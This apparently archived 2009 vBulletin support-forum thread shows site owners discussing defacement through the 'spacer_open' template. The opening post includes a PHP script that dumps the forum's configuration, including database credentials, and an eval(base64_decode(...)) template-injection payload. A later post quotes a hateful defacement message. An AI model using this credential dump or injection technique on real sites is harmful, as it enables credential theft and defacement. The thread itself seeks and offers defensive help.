forum is hacked by change (Spacer_open )

**Mr.FahaD** · Mon 5 Jan '09, 7:47am

Hello again,
I have found from SE, how to hack by using spacer_open, but i didn't undertand it..

1- make a file n put this in it :

PHP Code:


<?    
define('VB_AREA', 'Forum');   
define('DIR', '/h ome/xxx/public_html/vb');  define('CWD','/h ome/xxx/public_html/vb');    include("/h ome/xxx/public_html/vb/global.php");    
$vbulletin->fetch_config();   
@ini_set('pcre.backtrack_limit', -1);   


echo ' <div align="center"><big><b> (L0v3R-4lr33M = Mohajer22) </b></big></div> ' ;   
echo '<center><table border="1" cellspacing="1" cellpadding="3" width="500" style="border-style:solid; border-width:2; background:#404040; color: #000000; " height="29">';   
foreach ($vbulletin->config as $key => $value)   
{   
    echo '<tr>   
      <td colspan="2" align="center" style="background: #000000 ; color: #ffffff; font: bold 10pt verdana, geneva;" height="1">' . $key . '</td></tr>';   

    foreach ($value as $key2 => $value2)   
    {   
        echo '<tr>   
      <td width="50%" style="background: #404040; color: #00FF00;  font: bold 10pt verdana, geneva; height="19">' . $key2 . '</td>   
      <td width="50%" style="background: #404040; color: #FFFF00;  font: bold 10pt verdana, geneva; height="19">' . ($value2 ? $value2 : '&nbsp;') . '</td></tr>';   
    }   
}   
echo '</table></center>';   
exit;   

?>

then u will see all the information.

2- we go the all index and modify
" To '

3- coding index by using Base64

4- put the coding as bottom:
echo" put it here";

for example, the print index will be like that
echo"aGFja2VkIGJ5IE1vaGFqZXIyMg==";

then we will put the code what we created in this function :

$spacer_open
{${eval(base64_decode('

put the results here

'))}}{${exit()}}&
$_phpinclude_output

and we added to the table.

hope it's help u to fix all version from this exploit !

**Lynne** · Mon 5 Jan '09, 8:59am

It looks like the hacker needs to put that file on your server. Have you searched your files for a non-vb file at all? Also, in order to put that file on your server, they needed to have access to your server. I would talk to your host about this after you find the file.

**Mr.FahaD** · Mon 5 Jan '09, 11:53am

no, he didn't upload any thing at all
Also, the host is confirmed that !

**Lynne** · Mon 5 Jan '09, 1:00pm

Well, the script you posted can't be run unless it is on the server. Has the host confirmed that it wasn't uploaded and then removed?

**Mr.FahaD** · Wed 7 Jan '09, 9:38am

yes,,,

the spacer_open and spacer_close , many sites are been hacked by this way.

**beishe8** · Wed 7 Jan '09, 9:54am

Originally posted by Mr.FahaD

no, he didn't upload any thing at all
Also, the host is confirmed that !

Provided I want to hack a forum :

1- make a file n put this in it :

My file is ready but what to do with it on my computer?
So Lynne is right,I have to upload it to the server.
How? I have to have FTP access to that server and I don't have...

Is HTML enabled on that forum? Maybe somehow I can use it to insert something on that server...

**Golzarion** · Sun 11 Jan '09, 2:07am

It happen on Shared hosting !!!

the file will be uploaded on the server but not your account !
The really important thing that you forgot is :

change the password of database !!!

It is because of shared server weak security.

**Mr.FahaD** · Wed 14 Jan '09, 1:49am

thnx for ur reply ,

I got hacked again yesterday ! ,

I have change the username and password for the detabase and updated in config.

I'm having a reselley,is there any function should i tell the hostting to disable it ..?

I have talked with the company many times and they said "There in nothing from server security" . this happen due to vBulletin Script !

**Steve Machol** · Wed 14 Jan '09, 11:24am

Please see this thread on how to make your vBulletin more secure:

vBulletin 6, The World's Leading Community Software

http://www.vbulletin.com/go/secure

vBulletin Community Software

If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.

**Mr.FahaD** · Wed 14 Jan '09, 12:32pm

hello steve,
98% of this steps i'v done already.

it there any problem with config.php ?
so, i have to change the name and directory for it ?

and if it's from server , which function he should disable it ? and which add-on should he installed ?

**Steve Machol** · Wed 14 Jan '09, 12:49pm

There is no need to change config.php. If someone has access to that, then this is a server issue.

**Mr.FahaD** · Thu 22 Jan '09, 12:58pm

hello,
ok, if it's server issue , what functions should be disabled that prevent hacker to change the template "spacer_open".

as i mentioned before , many sites is hacked by change the template spacer_open only !

**Maplewoods** · Sun 25 Jan '09, 9:32pm

VB Hackers Specialty

I got hacked too.

Please let us know what you did to fix your site (precisely which files had to be re-uploaded or replaced).

Checking out their web site is seems that they seem to specialize in VB Hacking.

Is anyone familiar with this and exactly what they do to hack and exactly what needs to be done to fix the site and to PREVENT them from doing it again?

My Index.php loads their hacked version of their page, although as far as I can tell, my actual index.php is the genuine VB page.

I havn't been able to figure out where their hacked page is hiding and how they manage to exchange the real VB page for their hacked version.

All my other sub-pages of VB work OK

If someone doesn't really know the specifics of this particular group of hackers, then the easiest thing to say (if you don't know) is to recommend to "do everything" - listing a very long list of STANDARD security recommendations - but that's the "easy way out".

The "easy answer" is to recommend all the STANDARD recommendations which applies to anything and everything that can be exploited, but my question is, does anyone know the specifics of what this precise group of hackers do, so that past damage can be fixed and future damage stopped.

I assume that I am not the only VB hacked by them and that they have damaged thousands of other VB sites, regularly.

My hacked by pages stated:

By SuB-ZeRo
FrOm:AlGeRiA
visite my forum www.dz-security.net/vb
who dont love mouslims he go f??? hi self
f??? u admin and f??? all users f??? israel & usa & danemark
WhErE Is ThE SeCuRiTy.. !?
we are mouslimme and we are all withe gaza
FoR CoNTaCTe
[email protected]

**Golzarion** · Mon 26 Jan '09, 12:37pm

I do not really know what they do .... but I am sure it is because of SERVER weak security .... and most of the time it happened on SHARED server hosting...
never forgot to change your DATABASE password after got hacked ...

forum is hacked by change (Spacer_open )

forum is hacked by change (Spacer_open )

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment